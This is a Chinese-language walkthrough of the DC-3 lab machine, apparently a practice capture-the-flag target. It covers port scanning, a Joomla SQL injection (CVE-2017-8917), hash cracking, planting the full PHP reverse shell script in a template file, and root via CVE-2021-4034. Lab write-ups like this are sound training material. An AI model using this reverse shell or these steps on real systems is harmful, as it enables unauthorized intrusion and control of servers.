DC-3

author:leadlife

data:2023/5/15

blog:https://tripse.github.io/

本次测试使用到的工具如下:

  • 信息收集:nmap、fscan、cmseek、searchsploit
  • hash识别:hashid
  • 暴力破解:hashcat
  • 内部信息收集:无
  • 权限提升:无

外部信息收集

Nmap ICMP 扫描发现主机

其中 IP:10.10.10.130 为 靶机 IP

1
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
1
2
3
4
5
6
7
8
9
10
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:08 CST
Nmap scan report for 10.10.10.130
Host is up (0.000092s latency).
MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00026s latency).
MAC Address: 00:50:56:FC:DC:5C (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds

Fsacn 探测开放端口

发现仅开放 80 端口

1
sudo fscan -h 10.10.10.130 -t 30 -p 0-65535
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.130    is alive
[*] Icmp alive hosts len is: 1
10.10.10.130:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle: http://10.10.10.130       code:200 len:7082   title:Home
[+] http://10.10.10.130 poc-yaml-joomla-cve-2017-8917-sqli
已完成 1/1
[*] 扫描结束,耗时: 3.732715478s⏎

Nmap 进行详细端口扫描

  • 为避免某些端口的疏忽,这里再用 nmap 进行一次扫描

  • 发现提示 WEB 为 Joomla

1
sudo nmap -sS -sV -sC -T4 --min-rate 10000 -O -oN nmap.all 10.10.10.130 -p0-65535
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:11 CST
Nmap scan report for 10.10.10.130
Host is up (0.00026s latency).
Not shown: 65535 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

判断 CMS

访问 Web 页面验证是否为 Jommla

image-20230515181253134

CMSeek 判断 CMS 版本

image-20230515181329065

image-20230515181340546

image-20230515181353495

searchsploit 搜寻 cms 版本漏洞

可以判定很可能存在 SQL 注入,那么下面思路如下:

  • 通过 SQL 注入拿到数据库中后台的管理员密码
  • 后台获取 SHELL

image-20230515181537848

获取 SHELL

利用漏洞

先查看漏洞的说明

image-20230515181733074

这里用 PHP 起一个 HTTP 服务利用该脚本进行测试

image-20230515182134882

访问本地 127.0.0.1:1234 利用如下:

image-20230515182236789

识别 Hash

image-20230515182506684

破解 Hash

利用到 hashcat

密码字典:seclists:/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

1
hashcat -a 0 -m 3200 hash.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

得到密码:snoopy

image-20230515183708534

登入后台 Getshell

来到后台:http://10.10.10.130/administrator/index.php

image-20230515184741578

这里利用到 php-reverse-shell.php,内容如下:

注意修改 IP 和端口用于 nc 监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

操作步骤如下:

image-20230515190123932

image-20230515190153337

image-20230515190205258

将源 error.php 代码删除,复制粘贴 php-reverse-shell.php 内容进去

image-20230515190302686

本地启用监听:

1
nc -lvnp 1234

访问:http://10.10.10.130/templates/beez3/error.php

即可获得回弹 SHELL

image-20230515190347290

内部信息收集

优化 SHELL

  • 操作 TTY SHELL :python -c 'import pty;pty.spawn("/bin/bash")'

  • 操作环境变量:export TERM=xterm

内核与发行版

image-20230515190654161

SUID

操作 SUID 时发现了该程序,可直接用 CVE-2021-4034 本地提权

image-20230515190732470

SUDO

无 sudo 位

image-20230515190544048

权限提升

先本地用 Python 起一个 Web 用于传输文件

image-20230515190921287

编译,提权

image-20230515191207687

End Flag

image-20230515191229007